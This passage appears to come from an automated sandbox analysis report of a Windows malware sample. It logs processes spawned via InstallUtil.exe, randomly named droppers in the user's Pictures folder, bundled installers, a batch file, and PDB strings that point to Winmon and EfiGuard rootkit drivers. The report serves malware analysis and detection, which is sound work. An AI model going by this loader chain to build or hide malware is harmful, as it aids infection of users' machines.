                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe "C:\Users\user\Pictures\h9Cux8w1auuBknjQZWKFquuD.exe" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 460 -p 1892 -ip 1892
                    Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 1892 -s 55932
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                    Source: C:\Windows\System32\WerFault.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exeProcess created: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp "C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmp" /SL5="$4043A,1591872,56832,C:\Users\user\Pictures\JgqIdYSSt70LQLRUqfTzKJw8.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpProcess created: C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe "C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe" -s
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess created: C:\Users\user\AppData\Local\Temp\syncUpd.exe C:\Users\user\AppData\Local\Temp\syncUpd.exe
                    Source: C:\Users\user\Pictures\3cs4PKncIzTPVTZHP3GDsO8B.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.24 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2c0,0x2f0,0x6c1121c8,0x6c1121d4,0x6c1121e0
                    Source: C:\Users\user\Pictures\7odVnHyI6UBWlRBALo6WuNSW.exeProcess created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe "C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\7odVnHyI6UBWlRBALo6WuNSW.exe" --version
                    Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                    Source: C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exeProcess created: C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp "C:\Users\user\AppData\Local\Temp\is-05J74.tmp\FNi4gQqkHn29EqnTv0rxfxe1.tmp" /SL5="$1050E,1591872,56832,C:\Users\user\Pictures\FNi4gQqkHn29EqnTv0rxfxe1.exe"
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\xzRRQmj1LpBxF1iTy72H1YWe.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\jUzz7ezNBFbkGCxJO9DOH9dj.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\XgAVLWIvGKK9IeCrDuWuJavo.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\qvx2vm8LJ8TphvujtDcRyl5q.exeProcess created: unknown unknown
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\bizN5UTpdWpltkCaYrvmwbQI.exeProcess created: unknown unknown
                    Source: C:\Users\user\Pictures\PvJ9KZy5kaC0ZzTLP46Ng6g6.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                    Source: C:\Users\user\AppData\Local\Temp\is-RT5H8.tmp\JgqIdYSSt70LQLRUqfTzKJw8.tmpWindow found: window name: TMainForm
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                    Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: Loader.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb7 source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3279720319.0000000001079000.00000040.00000020.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer_lib.dll.pdb@+ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: `K_lib.dll.pdb source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: Unable to locate the .pdb file in this location source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: The module signature does not match with .pdb signature. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .pdb.dbg source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: '(EfiGuardDxe.pdbx source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: symsrv.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000C7A000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003599000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: or you do not have access permission to the .pdb location. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: EfiGuardDxe.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000843000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000003163000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: .exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3396601098.0000000003300000.00000002.00000001.00040000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000000.2579531105.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000000.2590444832.00000000005F7000.00000080.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000000.2678718445.0000000000F37000.00000080.00000001.01000000.00000024.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3385308767.00000000031B0000.00000002.00000001.00040000.00000024.sdmp
                    Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: c:\srv\slave\workdir\repos\opera\chromium\src\out\Release\installer.exe.pdb@ source: 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.0000000000391000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000391000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000CD1000.00000040.00000001.01000000.00000024.sdmp
                    Source: Binary string: dbghelp.pdb source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: dbghelp.pdbGCTL source: N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000ACD000.00000040.00000001.01000000.00000021.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.00000000033EC000.00000040.00001000.00020000.00000000.sdmp

                    Data Obfuscation

                    barindex
